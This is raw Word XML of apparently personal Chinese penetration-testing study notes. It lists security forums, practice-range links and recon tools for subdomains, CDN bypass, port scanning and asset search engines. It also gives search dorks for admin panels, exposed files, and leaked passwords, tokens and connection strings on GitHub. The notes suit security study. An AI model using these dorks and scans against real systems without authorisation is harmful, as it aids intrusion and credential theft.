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5B0D" w14:textId="77777777" w:rsidR="0045396C" w:rsidRDefault="00BF52E4" w:rsidP="00FB531E">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://bbs.ichunqiu.com/thread-35887-1-1.html?from=beef" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00FB531E" w:rsidRPr="009F2EF9">
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
        <w:t>https://bbs.ichunqiu.com/thread-35887-1-1.html?from=beef</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00FB531E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FB531E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>渗透测试 （寒假练手）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D45DE55" w14:textId="77777777" w:rsidR="00FB531E" w:rsidRDefault="00C51675" w:rsidP="00FB531E">
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00FB531E">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://www.ichunqiu.com/battalion?t=2&amp;r=54399</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00FB531E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FB531E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>靶场</w:t>
      </w:r>
      <w:r w:rsidR="009415C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6F5033" w14:textId="77777777" w:rsidR="009415C3" w:rsidRDefault="009415C3" w:rsidP="009415C3">
      <w:r>
        <w:t>https://www.freebuf.com/articles/web/213675.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45648EF7" w14:textId="77777777" w:rsidR="009415C3" w:rsidRDefault="009415C3" w:rsidP="009415C3">
      <w:r>
        <w:t>https://www.freebuf.com/vuls/211847.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCD7CC9" w14:textId="77777777" w:rsidR="009415C3" w:rsidRDefault="009415C3" w:rsidP="009415C3"/>
    <w:p w14:paraId="0F3909CF" w14:textId="77777777" w:rsidR="009415C3" w:rsidRDefault="009415C3" w:rsidP="009415C3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>逻辑漏洞：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A39F510" w14:textId="77777777" w:rsidR="009415C3" w:rsidRDefault="009415C3" w:rsidP="009415C3">
      <w:r>
        <w:t>https://www.freebuf.com/articles/web/160883.html 用户密码重置凭证</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7B1664" w14:textId="77777777" w:rsidR="009415C3" w:rsidRDefault="009415C3" w:rsidP="009415C3">
      <w:r>
        <w:t>https://www.freebuf.com/articles/database/161495.html  重置凭证</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>接收端可篡改</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5916E147" w14:textId="77777777" w:rsidR="009415C3" w:rsidRDefault="009415C3" w:rsidP="009415C3"/>
    <w:p w14:paraId="5DCD50A9" w14:textId="77777777" w:rsidR="009415C3" w:rsidRDefault="009415C3" w:rsidP="009415C3">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>freebuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>寻找文章</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289C4481" w14:textId="77777777" w:rsidR="0045396C" w:rsidRDefault="0045396C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DFCCBED" w14:textId="77777777" w:rsidR="009415C3" w:rsidRDefault="009415C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36280C61" w14:textId="77777777" w:rsidR="0045396C" w:rsidRDefault="0045396C" w:rsidP="00972178">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="396FB171" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>学习看</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞的文章</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF70B7A" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00C51675" w:rsidP="00F76936">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="00F76936" w:rsidRPr="00B01FDE">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>https://bbs.ichunqiu.com/forum.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7C800F79" w14:textId="77777777"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知社区</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DE9216" w14:textId="77777777"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乌云</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10973D06" w14:textId="77777777"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FREEBUF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150CB94B" w14:textId="77777777" w:rsidR="00F76936" w:rsidRPr="00CA7E51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墨</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>者文章</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>资料</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242D28DF" w14:textId="77777777"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ol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 w:rsidR="00BF52E4">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00BF52E4">
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.t00ls.net/Penetration-articles.html" </w:instrText>
      </w:r>
      <w:r w:rsidR="00BF52E4">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A9439B">
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>https://www.t00ls.net/Penetration-articles.html</w:t>
      </w:r>
      <w:r w:rsidR="00BF52E4">
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7385B672" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BB51F89" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E87A8CF" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5563BF2D" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>信息收集：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAA011A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ois</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF947E5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长之家：</w:t>
      </w:r>
      <w:hyperlink r:id="rId1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hois.chinaz.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1847E300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ugscaner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://whois.bugscaner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hois.bugscaner.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DC436E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爱站网：</w:t>
      </w:r>
      <w:r w:rsidR="00BF52E4">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00BF52E4">
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.aizhan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1" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//www.aizhan.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="551390ED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在线：</w:t>
      </w:r>
      <w:r w:rsidR="00BF52E4">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00BF52E4">
        <w:instrText xml:space="preserve"> HYPERLINK "https://bgp.he.net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2" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//bgp.he.net</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6AABB640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总域名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587BB381" w14:textId="77777777"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企查查：</w:t>
      </w:r>
      <w:hyperlink r:id="rId1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qichacha.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA2382D" w14:textId="77777777"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备案查询网：</w:t>
      </w:r>
      <w:r w:rsidR="00BF52E4">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00BF52E4">
        <w:instrText xml:space="preserve"> HYPERLINK "http://www.beianbeian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//www.beianbeian.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1651E7CC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子域名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F364198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neForAll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shmilylty/OneForAll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5" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//github.com/shmilylty/OneForAll</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3F7F3ECF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bDomainsBrute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lijiejie/subDomainsBrute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6" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//github.com/lijiejie/subDomainsBrute</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0F9955D5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list3r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aboul3la/Sublist3r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//github.com/aboul3la/Sublist3r</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="087E7C90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NS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>二进制搜索：</w:t>
      </w:r>
      <w:r w:rsidR="00BF52E4">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00BF52E4">
        <w:instrText xml:space="preserve"> HYPERLINK "https://dns.bufferover.run/dns?q=.baidu.com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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>dns.bufferover.ru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 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q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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t> .baidu.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777D4BEB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旁站</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD66BA3" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F7693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2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21" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//stool.chinaz.com/same</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="68EC0A07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真实</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4249A920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检测：</w:t>
      </w:r>
      <w:r w:rsidR="00BF52E4">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00BF52E4">
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.wepcc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2" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//www.wepcc.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1EEA10C3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</w:t>
      </w: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asm.ca.com/en/ping.php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//asm.ca.com/en/ping.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1491BE0B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检测：</w:t>
      </w:r>
      <w:r w:rsidR="00BF52E4">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00BF52E4">
        <w:instrText xml:space="preserve"> HYPERLINK "https://tools.ipip.net/dns.php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//tools.ipip.net/dns.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="36345E20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Xcdn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3xp10it/xcdn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//github.com/3xp10it/xcdn</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="120BB8F6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r w:rsidR="00BF52E4">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00BF52E4">
        <w:instrText xml:space="preserve"> HYPERLINK "https://webiplookup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//webiplookup.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="66C365D8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etcraft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toolbar.netcraft.com/site_report?url=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toolbar.netcraft.com/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>site_report</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId27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>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</w:p>
    <w:p w14:paraId="7126FD50" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00C51675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hyperlink r:id="rId29" w:history="1">
        <w:r w:rsidR="00F76936">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>网址</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00F76936">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidR="00F76936">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>https</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00F76936">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t> : </w:t>
      </w:r>
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r w:rsidR="00F76936">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//crt.sh</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7FD0CAD6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入口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>+ C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>段</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08027FC9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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>谷歌插件</w:t>
      </w:r>
      <w:proofErr w:type="gram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hodan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62ED083A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map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nmap.org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2" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//nmap.org</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3A617A7A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asscan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robertdavidgraham/masscan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3" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//github.com/robertdavidgraham/masscan</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="48A47941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工具：御剑高速端口扫描工具</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CC91C5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信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0126A2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googlehack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>语法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4633D630" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F7693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后台地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DACD843" w14:textId="77777777"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管理后台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员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</w:p>
    <w:p w14:paraId="7AF16099" w14:textId="77777777"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登录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guanli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登路</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1913BAC1" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F7693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文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F04A9E" w14:textId="77777777"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pdf / doc / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>xls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve"> / txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316B5455" w14:textId="77777777"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log / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve"> / conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8F1EE9" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F7693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测试环境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A1CF45" w14:textId="77777777"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测试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ceshi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3899895F" w14:textId="77777777"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intitle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>：测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7537CC5D" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F7693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邮箱</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>/ QQ /</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>群</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A7F73B" w14:textId="77777777"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邮件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电子邮件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC47E8E" w14:textId="77777777"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q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群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企鹅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腾讯</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3337EB9F" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F7693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其他</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03570B08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api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3D4EE455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uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve"> = / id =</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169A7416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标题：索引</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E64365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lastRenderedPageBreak/>
        <w:t>Github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2585E3AD" w14:textId="77777777"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密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秘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凭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令牌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通过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 xml:space="preserve">/ ftp / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1C7C3A8B" w14:textId="77777777"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urity_credentials</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>connetionstring</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve"> / JDBC / ssh2_auth_password / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>send_keys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="64DEA00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网盘引擎</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4BAE8CA7" w14:textId="77777777"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盘多多：</w:t>
      </w:r>
      <w:hyperlink r:id="rId34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35" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//www.panduoduo.net</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0256C787" w14:textId="77777777"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凌风搜索：</w:t>
      </w:r>
      <w:r w:rsidR="00BF52E4">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00BF52E4">
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.lingfengyun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lingfengyun.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>（下载近似）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563125E3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其他搜索</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368756E0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莎</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>顿：</w:t>
      </w:r>
      <w:r w:rsidR="00BF52E4">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00BF52E4">
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.shodan.io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shodan.io</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011C9EF4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ZoomEye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www.zoomeye.org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zoomeye.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420AA65F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FA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fofa.so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fofa.so</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9D590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历史突破</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086DA15D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乌云名义：</w:t>
      </w:r>
      <w:hyperlink r:id="rId3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shuimugan.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D42042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eebug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www.seebug.org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seebug.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E67C04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漏洞利用数据库：</w:t>
      </w:r>
      <w:r w:rsidR="00BF52E4">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00BF52E4">
